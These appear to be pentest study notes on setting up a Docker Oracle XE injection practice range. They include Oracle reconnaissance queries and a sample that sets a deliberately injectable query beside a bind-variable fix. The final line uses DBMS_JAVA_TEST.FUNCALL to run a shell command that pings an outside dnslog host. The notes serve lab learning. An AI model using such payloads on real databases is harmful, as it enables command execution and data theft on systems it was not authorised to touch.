- Penetration testing of Oracle databases
- ✅ Building an Oracle injection practice range
- ✅ Setting up the Oracle database service
- ✅ Web database connection test
- ✅ Starting the SQL injection range
- ❎ Database penetration testing against Oracle
- ✅ Common Oracle database pentest statements
- ❎ Simple pentest example
- ✅ Building an Oracle injection practice range
Reference link: Oracle error-based manual injection
Oracle database injection range setup
Starting the Oracle service
Oracle database penetration testing is done with Docker; the environment is as follows:
# DBA connection
- Command overview
```shell
# Pull the Oracle database image with docker
docker pull registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
# Load the image into a container named "oracle" running in the background, mapping the image's port 1521 to local port 1521
docker run -d -p 1521:1521 --name oracle registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
# Open an interactive shell in the oracle container
docker exec -it oracle bash
sqlplus /nolog
```
```sql
SQL> conn sys/oracle as sysdba
Connected.
SQL> select name from v$database;
NAME
---------
XE
```
```java
public class hello {
    public static void main(String[] args) {
        // Code-block rendering test
        System.out.println("this is a block test message");
        System.out.println("hello world");
    }
}
```
- Create a user and grant privileges
Web database connection
```sql
SQL> create tablespace pentest datafile '/tmp/pentest.dbf' size 100m;
Tablespace created.
SQL> create user pentest identified by pentest default tablespace pentest;
User created.
SQL> grant connect,resource,dba to pentest;
Grant succeeded.
SQL> exit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
root@bd849e50bab4:/# sqlplus pentest/pentest
SQL*Plus: Release 11.2.0.2.0 Production on Fri Feb 19 06:38:04 2021
Copyright (c) 1982, 2011, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> CREATE TABLE users (id number,name varchar(500),surname varchar(1000));
Table created.
SQL> INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset');
INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny');
INSERT INTO users (id, name, surname) VALUES (3, 'wu', 'ming');
INSERT INTO users (id, name, surname) VALUES (4, 'sqlmap/1.0-dev (http://sqlmap.org)', 'user agent header');
INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull');
commit;
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL>
1 row created.
SQL> commit;
Commit complete.
SQL> SELECT * FROM users where id=1;
ID
----------
NAME
--------------------------------------------------------------------------------
SURNAME
--------------------------------------------------------------------------------
1
luther
blisset
```
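As an added example that is not part of the original notes, here is the web-side lookup the range's "web database connection" step needs: the intentionally vulnerable string-built query beside the bind-variable version that defeats the injection. It assumes sqlite3 as an offline stand-in for Oracle and uses the constructed users rows from the sqlplus session above; the `:id` bind syntax is the same one python-oracledb uses against the real XE container.

```python
import sqlite3

# Constructed sample data: the same users rows the range's sqlplus session inserts.
USERS = [
    (1, "luther", "blisset"),
    (2, "fluffy", "bunny"),
    (3, "wu", "ming"),
    (4, "sqlmap/1.0-dev (http://sqlmap.org)", "user agent header"),
    (5, None, "nameisnull"),
]


def make_db():
    """In-memory sqlite3 stand-in for the Oracle XE container (assumption: offline demo)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, surname TEXT)")
    conn.executemany("INSERT INTO users (id, name, surname) VALUES (?, ?, ?)", USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """The range's intended flaw: the id from the request is pasted into the SQL text."""
    sql = "SELECT id, name, surname FROM users WHERE id=" + str(user_id)
    return conn.execute(sql).fetchall()


def lookup_bound(conn, user_id):
    """Hardened form: the id travels as a bind variable, never as SQL text.
    Against Oracle a non-numeric bind here raises ORA-01722 (invalid number);
    sqlite simply finds no matching row."""
    sql = "SELECT id, name, surname FROM users WHERE id=:id"
    return conn.execute(sql, {"id": user_id}).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, 1))            # one row, as the range expects
    print(lookup_vulnerable(db, "1 OR 1=1"))   # whole table: the injection succeeds
    print(lookup_bound(db, "1 OR 1=1"))        # no rows: the text is treated as a value
```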
Common statements for pentesting:
1 Current user privileges
select * from session_roles
2 Current database version
select banner from sys.v_$version where rownum=1
3 Server egress IP
can be obtained with utl_http.request
4 Server listening IP
select utl_inaddr.get_host_address from dual
5 Server operating system
select member from v$logfile where rownum=1
6 Server SID, needed for remote connections
select instance_name from v$instance;
7 Currently connected user
select SYS_CONTEXT('USERENV', 'CURRENT_USER') from dual
Version:
select * from v$version;
Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
PL/SQL Release 11.2.0.4.0 - Production
CORE 11.2.0.4.0 Production
TNS for Linux: Version 11.2.0.4.0 - Production
NLSRTL Version 11.2.0.4.0 - Production
oracleShell.jar environment
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production
PL/SQL Release 11.2.0.1.0 - Production
"CORE 11.2.0.1.0 Production"
TNS for 32-bit Windows: Version 11.2.0.1.0 - Production
NLSRTL Version 11.2.0.1.0 - Production
select utl_inaddr.get_host_address from dual
172.17.0.2
Patches:
select * from dba_registry_history;
2018-04-25 12:22:17.105985 APPLY SERVER 11.2.0.4 0 PSU Patchset 11.2.0.2.0
Privileges:
select * from session_roles;
CONNECT
RESOURCE
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_SELECT_ROLE
EXECUTE_CATALOG_ROLE
HS_ADMIN_EXECUTE_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
DATAPUMP_EXP_FULL_DATABASE
DATAPUMP_IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
SCHEDULER_ADMIN
WM_ADMIN_ROLE
Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','ping ojuht0.dnslog.cn') from dual;